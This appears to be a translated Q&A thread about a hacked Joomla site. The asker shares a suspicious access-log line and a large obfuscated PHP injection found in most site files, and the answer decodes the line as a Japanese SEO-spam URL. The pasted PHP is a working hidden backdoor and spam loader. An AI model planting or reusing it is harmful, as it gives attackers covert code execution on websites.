Joomla Access Log - 解读日志文件与网站被入侵

时间:2017-02-28 22:58:31

标签: php apache malware-detection

我的一个Joomla网站被黑了。我已从文件中删除了所有恶意代码。

但我的access.log仍有一些像这样的条目:

66.249.64.200 - - [01/Mar/2017:00:55:45 +0530] "GET /conure/aerobiotic/6064/14419/lymphadenosis/deionize/calla/%EF%BC%91%E5%8F%B0%E5%88%86%E3%82%A8%E3%82%B9%E3%83%9A%E3%83%AA%E3%82%A2ACTIVE%E3%82%B9%E3%83%BC%E3%83%91%E3%83%BC%E3%83%80%E3%82%A6%E3%83%B3%E3%82%B3%E3%82%A4%E3%83%AB%E3%82%B9%E3%83%97%E3%83%AA%E3%83%B3%E3%82%B0/cth.

我该怎么做?

更新:站点中的大多数文件都包含下面这段代码:

<?php $ajwlfdcsu = '%!*72!  x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9n%<#372]58y]472]37y]672]f{jt)!gj!<*2bd%-#1GO   x22#)fepmqyfAmw/    x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452svufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]8#/#M5]DgP5]D6#<%fdy>#]D4]275]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.9844-   x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)%./#@#/qp%>5h%!<*::::::-111112k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/f    x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7PNFS&d_SFSFGFS`QUUI&rd($n)-1);} @error_reporting(0); $eyicfuo = ifubfsdXk5`{66~6<&w6<   x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&6<fm%:-5ppde:4:|:**#ppde#)tutjyf`4  x223}!+!<+{e%+*but`cpV  x7f x7f x7f x7f<u%V x27{ftmfV7R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;;/#/#/},;#-#}+;%-qp%)54l}  x27;%!<*#}_;#)323ldfid>}&;!osvufs}  x7f;!b:<!%c:>%s:    x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%w)gj6<^#Y#   x5cq%   x27Y%6<.bozcYufhA   x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#w)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56986<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6< x7fwepnbss!>!bssbz)#44ec:649#-!#:618dif((function_exists("  x6f 142 x5f 163 x74 141 x72 164") && (!isset($GL}88:}334}472    x24<!%ff2!>!bssbz)  x24]25  x2x61"])))) { $GLOBALS["    x61 156 x75 1568y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvy]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opiubq#  x5cq%   x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr#    x5cq%)ufttj x22>/7&6|7**111127-K)ebfsX  x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyut)tpqssutRe%)Rd%)Rb%))!tf!%z>2<!%ww2)%w`TW~  x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-," x61 156 x64 162 x6f 151 xAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,2x24-    
x24tvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]5]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss  x53]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]2%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpus%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>-UFOJ`GB)fubfsdXA   x27K6<  x7fw6*3qj%7>    x22Z;^nbsbq%    x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.hIr   x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtj)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#trstr($uas," x72 166 x3a 61  x31")) or (strstr($uas57    x78"))) { $fvspigj6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+   x24*<!%t::!>!   x24Ypp3)%cB%iNuas," x66 151 x72 145 x66 14- x24-!%  x24-    x24*!|! x24-    x24 x5c%j^      x61"]=1; $uas=strtolower($_S#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#]88]5]48]32M3]317]445]212]44judovg!|!**#j{hnpd#)tutjyf`opjudovg  x22)!gj}1~!<2p% 75  156 x63 164 x69 157 x6e"; function pbfboor($n){return chr(o!    x27!hmg%)!gj!~<ofmy%,3,j%>j%x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gp6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7g%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)msv`ftsbqA7>q%6< x7fw6*  x7f_*#  x7f<*X&Z&S{ftmfV    x7f<*X}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+3,j%>j%!*3!  x27!hmg%!)!gjmplode(array_map("pbfboor",str_split("%tjw!>!#]y84]>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%x41  107 x45 116 x54"]); if ((strstr($uas,"  x6d 163 x69 145")) or (s!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!    x27!hm57]y86]267]y74]275]y7:]268]y7f#<!%tww!>!  x2400~:<h%_t%:o x24-    x24*<!~!    
x24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!fyqmpef)# x24-    x24]y8  x24-    x24]26  x24-    x24<%j,,*!| x2ERVER["   x48 124 x54 120 x5f 125 x53 105 x52 137 pi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt = "    x63 162 x65 141 x74 145 x5f 146 xb% x7f!<X>b%Z<#opo#>b%!*##>>gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbss%i  x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%}#-!   x24/%tmw/   x24)%c*W%eN+#Qi x5c1^W%c!>!jRk3`{666~6<&w6< x7fw6*CW&)7g.fmjgA  x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)7gj6<*iopjudovg}k~~9{d%:osvufs:~928>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439svufs!*!+A!>!{e%)!>>   x22!ftmbg)!gj<*#k#)us72qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA    x273qj%6<*Y%)fn275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:sutcvt)esp>hmg%!<12>j%!|!*#91OBALS[" x61 156 x75 156 %bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<z-#:#*  x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4j6<.[A x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;ut275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuho!>!  x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%5:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]6!<2,*j%!-#1]#-bubE{h%)tpqsut>jtbc  x7f!|!*uyfu x27k:!ftmf!}]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<b!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FU:75983:48984:71]K9]77]D4]82]K#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! 
x242178}527w2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fm.%!<***f   x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof.)fepdof!-#jt0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y84]275]y83]27*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR   x27id%6<    x7fw6*  x7f_*#ujo3]D6P2L5P6]y6gP7L6M7]%}U;y]}R;2]},;osvufs} x27;mnui}&;D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#   x24#-!#]>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbeX)!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-64")) or (strstr($uas,"    x63 150 x72 157 x6d 145")) or (strstr($!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!o;*   x7f!>>  x22!pd%)!gj}Z;h!opjudovgd%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<;!>!}  x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}wc_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!    xw6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|so!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!    
x24/%ty38#-!%w:**<")));$xabwuqv = $fvspigj("", $eyicfuo); $xabwuqv();}}}{;#)tutjyf`opjudovg)!gj!|!*msv%)}uyfu%)3of)fepdof`57fStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtScugucngakh'; $hqlapc=explode(chr((637-517)),substr($ajwlfdcsu,(27145-21125),(230-196))); $vsldyu = $hqlapc[0]($hqlapc[(6-5)]); $ucggmim = $hqlapc[0]($hqlapc[(9-7)]); if (!function_exists('ugnpho')) { function ugnpho($fxjtykhlos, $qgxlcctuo,$fuzdrgk) { $tmhrwbd = NULL; for($xdounsoq=0;$xdounsoq<(sizeof($fxjtykhlos)/2);$xdounsoq++) { $tmhrwbd .= substr($qgxlcctuo, $fxjtykhlos[($xdounsoq*2)],$fxjtykhlos[($xdounsoq*2)+(4-3)]); } return $fuzdrgk(chr((62-53)),chr((349-257)),$tmhrwbd); }; } $oupzhybp = explode(chr((275-231)),'1282,70,4255,24,1393,38,2733,29,3627,48,3341,67,2480,50,1809,28,5477,63,2667,27,2530,21,3715,38,2873,62,683,45,3255,51,4174,52,4500,65,5807,51,1694,37,612,51,1633,61,1185,64,3009,70,2295,41,4123,51,1072,44,1569,64,1048,24,3115,30,728,60,3943,70,5610,59,4986,67,3914,29,4388,56,3675,40,3169,61,5669,45,5576,34,5966,34,509,69,3230,25,4635,30,0,52,2935,30,3408,59,3079,36,4226,29,1512,57,2821,52,2965,44,76,34,5298,60,4882,55,480,29,2421,59,2604,34,578,34,2167,41,1731,24,3781,47,4725,41,663,20,5714,36,3753,28,5414,63,6000,20,4665,28,2336,44,917,66,4013,68,4444,56,788,48,5540,36,4081,42,836,37,3145,24,1837,59,873,44,158,59,5074,33,5750,57,5358,56,4937,49,2069,48,3467,56,282,46,1431,46,2208,37,52,24,1952,56,4795,53,1352,41,2694,39,1896,56,4343,45,3583,44,413,67,3523,60,2638,29,3872,42,3828,44,1249,33,1477,35,5858,43,110,48,2380,41,1116,69,4565,70,355,58,4766,29,2551,53,328,27,5053,21,5107,68,4693,32,4279,64,2117,50,217,65,2793,28,2008,61,5175,56,2245,50,3306,35,983,65,4848,34,1755,54,2762,31,5231,67,5901,65'); $umtfepxsu = $vsldyu("",ugnpho($oupzhybp,$ajwlfdcsu,$ucggmim)); $vsldyu=$ajwlfdcsu; $umtfepxsu(""); $umtfepxsu=(557-436); $ajwlfdcsu=$umtfepxsu-1; ?><?php

1 个答案:

答案 0 :(得分:0)

这只是经过URL编码的日语文本,并不是恶意脚本。

基本上,这条日志表示:来自IP地址66.249.64.200的访问者在2017年3月1日00:55:45访问了您的网站,时间戳的时区偏移为GMT+5小时30分钟(对应印度时间)。

他们试图从网址中检索数据:

/conure/aerobiotic/6064/14419/lymphadenosis/deionize/calla/1台分エスペリアACTIVEスーパーダウンコイルスプリング/cth.

这段URL编码的日语直译过来是:

One car for Hesperia ACTIVE Super Down Coil Spring

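假设您的网站上不存在该网页,他们只会得到一个404;即使页面存在,服务器也只是返回该页面。就这条请求本身而言,绝对没有什么恶意需要担心 :) 不过需要注意:66.249.64.0/19 网段通常属于 Googlebot(可通过反向DNS核实),而“随机英文单词 + 日文商品关键词”形式的路径是日文关键词垃圾页面(SEO spam)的常见特征,因此这类请求可能说明搜索引擎仍在抓取入侵期间生成的垃圾URL。建议确认这些URL现在返回404或410,并再次检查站点文件(包括问题中贴出的那段混淆PHP代码是否已全部清除)以及搜索引擎中的收录情况。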

希望这有帮助!